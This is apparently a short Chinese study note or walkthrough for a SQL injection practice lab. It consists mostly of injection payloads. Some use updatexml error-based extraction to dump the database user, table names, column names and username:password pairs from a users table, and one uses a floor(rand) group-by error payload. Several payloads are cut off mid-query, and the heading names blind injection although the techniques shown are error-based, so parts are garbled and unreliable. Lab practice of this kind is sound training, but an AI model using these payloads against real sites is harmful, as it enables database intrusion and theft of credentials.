布尔盲注
首先进行单引号闭合和不闭合测试
?id=-1' order by 3--+
报错回显(这里使用了连接函数concat)
?id=1' and updatexml(1,concat('~',(select user()),'~'),1)--+
先查字段
?id=1' and updatexml(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema='security'),0x7e),1)--+
再查表
?id=1' and updatexml(1,concat(0x7e,(select group_concat(column_name)from information_schema
再通过字段(可以看到爆表了)
可是库出来了,数据不完整,跟我们前几关差异很大,updatexml最大容纳32个字节
?id=1' and updatexml(1,concat(0x7e,(select group_concat(username,0x3a,password)from users),
?id=1' and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a)--+